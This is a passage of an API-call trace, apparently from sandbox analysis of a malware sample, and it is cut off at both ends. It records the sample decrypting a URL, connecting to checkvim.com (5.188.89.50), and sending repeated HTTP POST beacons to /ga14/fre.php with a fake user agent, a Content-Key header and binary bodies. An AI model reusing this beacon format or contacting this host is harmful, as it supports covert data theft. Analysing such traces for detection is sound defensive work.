pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0263.135] GetProcessHeap () returned 0x840000 [0263.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0263.135] socket (af=2, type=1, protocol=6) returned 0x3c8 [0263.136] connect (s=0x3c8, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0263.212] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0263.212] GetProcessHeap () returned 0x840000 [0263.212] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0263.212] GetProcessHeap () returned 0x840000 [0263.212] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0263.213] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0263.214] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0263.214] GetProcessHeap () returned 0x840000 [0263.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0263.214] GetProcessHeap () returned 0x840000 [0263.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0263.215] GetProcessHeap () returned 0x840000 [0263.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f950 [0263.215] GetProcessHeap () returned 0x840000 [0263.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0263.216] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0263.217] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0263.217] GetProcessHeap () returned 0x840000 [0263.217] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0263.217] GetProcessHeap () returned 0x840000 [0263.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0263.217] send (s=0x3c8, buf=0x873a58*, len=237, flags=0) returned 237 [0263.218] send (s=0x3c8, buf=0x87eb58*, len=159, flags=0) returned 159 [0263.218] GetProcessHeap () returned 0x840000 [0263.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0263.218] recv (in: s=0x3c8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0263.577] GetProcessHeap () returned 0x840000 [0263.577] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0263.577] GetProcessHeap () returned 0x840000 [0263.577] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0263.577] GetProcessHeap () returned 0x840000 [0263.577] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0263.577] GetProcessHeap () returned 0x840000 [0263.577] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0263.577] closesocket (s=0x3c8) returned 0 [0263.579] GetProcessHeap () returned 0x840000 [0263.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0263.580] GetProcessHeap () returned 0x840000 [0263.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0263.580] GetProcessHeap () returned 0x840000 [0263.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0263.580] GetProcessHeap () returned 0x840000 [0263.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0263.580] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb90) returned 0x3c8 [0263.583] Sleep (dwMilliseconds=0xea60) [0263.584] GetProcessHeap () returned 0x840000 [0263.584] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0263.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.585] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0263.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.670] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0263.680] GetProcessHeap () returned 0x840000 [0263.680] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0263.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.681] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0263.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.682] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0263.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.683] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.683] GetProcessHeap () returned 0x840000 [0263.683] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0263.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.684] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0263.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.686] CryptDestroyKey (hKey=0x87e930) returned 1 [0263.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.687] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0263.687] GetProcessHeap () returned 0x840000 [0263.687] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0263.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.688] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.694] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.696] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.697] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.697] GetProcessHeap () returned 0x840000 [0263.697] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0263.697] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0263.697] GetProcessHeap () returned 0x840000 [0263.697] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0263.697] GetProcessHeap () returned 0x840000 [0263.697] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0263.697] GetProcessHeap () returned 0x840000 [0263.697] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0263.697] GetProcessHeap () returned 0x840000 [0263.697] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0263.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.698] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0263.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.704] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0263.711] GetProcessHeap () returned 0x840000 [0263.711] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0263.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.712] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0263.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.713] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0263.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.714] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.714] GetProcessHeap () returned 0x840000 [0263.714] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0263.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.715] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0263.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.716] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0263.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.717] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0263.717] GetProcessHeap () returned 0x840000 [0263.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0263.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.718] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0263.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.719] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0263.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.720] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0263.720] GetProcessHeap () returned 0x840000 [0263.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0263.720] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0263.721] GetProcessHeap () returned 0x840000 [0263.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0263.721] socket (af=2, type=1, protocol=6) returned 0x3cc [0263.722] connect (s=0x3cc, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0263.792] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0263.796] GetProcessHeap () returned 0x840000 [0263.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0263.796] GetProcessHeap () returned 0x840000 [0263.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0263.797] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0263.798] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0263.798] GetProcessHeap () returned 0x840000 [0263.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0263.798] GetProcessHeap () returned 0x840000 [0263.798] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0263.798] GetProcessHeap () returned 0x840000 [0263.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0263.798] GetProcessHeap () returned 0x840000 [0263.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0263.798] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0263.799] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0263.799] GetProcessHeap () returned 0x840000 [0263.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0263.799] GetProcessHeap () returned 0x840000 [0263.799] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0263.799] send (s=0x3cc, buf=0x873a58*, len=237, flags=0) returned 237 [0263.800] send (s=0x3cc, buf=0x87eb58*, len=159, flags=0) returned 159 [0263.800] GetProcessHeap () returned 0x840000 [0263.800] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0263.800] recv (in: s=0x3cc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0264.172] GetProcessHeap () returned 0x840000 [0264.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0264.173] closesocket (s=0x3cc) returned 0 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0264.173] GetProcessHeap () returned 0x840000 [0264.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0264.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xd9c) returned 0x3cc [0264.175] Sleep (dwMilliseconds=0xea60) [0264.177] GetProcessHeap () returned 0x840000 [0264.177] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0264.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.178] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0264.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.186] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0264.193] GetProcessHeap () returned 0x840000 [0264.193] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0264.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.194] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0264.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.195] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0264.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.196] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.196] GetProcessHeap () returned 0x840000 [0264.196] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0264.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.197] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0264.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.198] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0264.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.199] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0264.199] GetProcessHeap () returned 0x840000 [0264.199] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0264.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.200] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.202] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.203] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.204] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.204] GetProcessHeap () returned 0x840000 [0264.204] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0264.204] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0264.210] GetProcessHeap () returned 0x840000 [0264.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0264.210] GetProcessHeap () returned 0x840000 [0264.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0264.210] GetProcessHeap () returned 0x840000 [0264.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0264.210] GetProcessHeap () returned 0x840000 [0264.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0264.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.211] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0264.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.218] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0264.227] GetProcessHeap () returned 0x840000 [0264.227] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0264.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.228] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0264.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.229] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0264.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.230] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.230] GetProcessHeap () returned 0x840000 [0264.230] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0264.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.231] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0264.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.232] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0264.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.233] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0264.233] GetProcessHeap () returned 0x840000 [0264.233] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0264.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.234] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0264.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.236] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0264.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.237] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0264.237] GetProcessHeap () returned 0x840000 [0264.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0264.237] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0264.239] GetProcessHeap () returned 0x840000 [0264.239] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0264.239] socket (af=2, type=1, protocol=6) returned 0x3d0 [0264.239] connect (s=0x3d0, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0264.309] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0264.310] GetProcessHeap () returned 0x840000 [0264.310] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0264.310] GetProcessHeap () returned 0x840000 [0264.310] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0264.311] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0264.312] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: 